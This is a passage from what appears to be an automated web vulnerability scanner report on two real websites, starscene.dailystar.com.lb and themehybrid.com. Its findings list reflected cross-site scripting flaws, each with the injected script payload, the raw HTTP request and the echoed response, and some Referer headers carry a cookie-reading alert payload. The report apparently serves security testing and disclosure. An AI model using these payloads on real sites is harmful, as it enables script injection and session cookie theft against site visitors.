Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.selectable.js62d72\"><script>alert(1)</script>4d7c1edb910?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.372. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cf2"><script>alert(1)</script>5999fd77bde was submitted in the REST URL parameter 1. This input was echoed as a1cf2\"><script>alert(1)</script>5999fd77bde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesa1cf2"><script>alert(1)</script>5999fd77bde/js/jquery/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesa1cf2\"><script>alert(1)</script>5999fd77bde/js/jquery/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.373. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>2c5de9ea418 was submitted in the REST URL parameter 2. This input was echoed as ff882\"><script>alert(1)</script>2c5de9ea418 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsff882"><script>alert(1)</script>2c5de9ea418/jquery/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsff882\"><script>alert(1)</script>2c5de9ea418/jquery/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.374. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd76"><script>alert(1)</script>5b57586f4c1 was submitted in the REST URL parameter 3. This input was echoed as 1fd76\"><script>alert(1)</script>5b57586f4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery1fd76"><script>alert(1)</script>5b57586f4c1/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery1fd76\"><script>alert(1)</script>5b57586f4c1/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.375. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4ac"><script>alert(1)</script>193d9090e81 was submitted in the REST URL parameter 4. This input was echoed as 5f4ac\"><script>alert(1)</script>193d9090e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.sortable.js5f4ac"><script>alert(1)</script>193d9090e81?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.sortable.js5f4ac\"><script>alert(1)</script>193d9090e81?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.376. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80693"><script>alert(1)</script>4b256f9809b was submitted in the REST URL parameter 1. This input was echoed as 80693\"><script>alert(1)</script>4b256f9809b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes80693"><script>alert(1)</script>4b256f9809b/js/swfobject.js?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes80693\"><script>alert(1)</script>4b256f9809b/js/swfobject.js?ver=2.1'; }); return true;" >
...[SNIP]...

4.377. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1994"><script>alert(1)</script>da72374b897 was submitted in the REST URL parameter 2. This input was echoed as a1994\"><script>alert(1)</script>da72374b897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsa1994"><script>alert(1)</script>da72374b897/swfobject.js?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:22 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsa1994\"><script>alert(1)</script>da72374b897/swfobject.js?ver=2.1'; }); return true;" >
...[SNIP]...

4.378. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96823"><script>alert(1)</script>d03062193c6 was submitted in the REST URL parameter 3. This input was echoed as 96823\"><script>alert(1)</script>d03062193c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/swfobject.js96823"><script>alert(1)</script>d03062193c6?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/swfobject.js96823\"><script>alert(1)</script>d03062193c6?ver=2.1'; }); return true;" >
...[SNIP]...

4.379. http://themehybrid.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a"><script>alert(1)</script>63682048419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d428a\"><script>alert(1)</script>63682048419 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d428a"><script>alert(1)</script>63682048419=1 HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.2.10.1295921862;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:24:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11026

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?d428a\"><script>alert(1)</script>63682048419=1"/>
...[SNIP]...

4.380. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b433f"><script>alert(1)</script>e14ba5f4f8a was submitted in the REST URL parameter 1. This input was echoed as b433f\"><script>alert(1)</script>e14ba5f4f8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogb433f"><script>alert(1)</script>e14ba5f4f8a/wp-content/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:28 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogb433f\"><script>alert(1)</script>e14ba5f4f8a/wp-content/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.381. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d5a"><script>alert(1)</script>28e0a6329e5 was submitted in the REST URL parameter 2. This input was echoed as e1d5a\"><script>alert(1)</script>28e0a6329e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente1d5a"><script>alert(1)</script>28e0a6329e5/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:04 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-contente1d5a\"><script>alert(1)</script>28e0a6329e5/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.382. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c913a"><script>alert(1)</script>d6100947d63 was submitted in the REST URL parameter 3. This input was echoed as c913a\"><script>alert(1)</script>d6100947d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/pluginsc913a"><script>alert(1)</script>d6100947d63/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:40 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/pluginsc913a\"><script>alert(1)</script>d6100947d63/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.383. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ec4"><script>alert(1)</script>624a982d9fe was submitted in the REST URL parameter 4. This input was echoed as e5ec4\"><script>alert(1)</script>624a982d9fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/cleaner-gallerye5ec4"><script>alert(1)</script>624a982d9fe/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
